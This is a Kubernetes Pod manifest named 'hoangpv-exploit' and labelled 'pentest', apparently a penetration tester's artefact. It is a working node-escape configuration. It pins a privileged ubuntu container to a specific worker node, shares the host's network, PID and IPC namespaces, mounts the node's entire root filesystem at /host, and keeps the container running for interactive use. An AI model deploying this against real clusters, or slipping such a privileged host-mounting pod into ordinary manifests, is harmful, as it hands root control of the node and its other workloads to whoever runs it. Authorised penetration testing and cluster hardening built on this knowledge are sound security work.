apiVersion: v1
kind: Pod
metadata:
  name: hoangpv-exploit
  labels:
    app: pentest
spec:
  nodeSelector:
    kubernetes.io/hostname: k8s-worker-02
  hostNetwork: true 
  hostPID: true 
  hostIPC: true 
  containers:
  - name: hoangpv-exploit
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
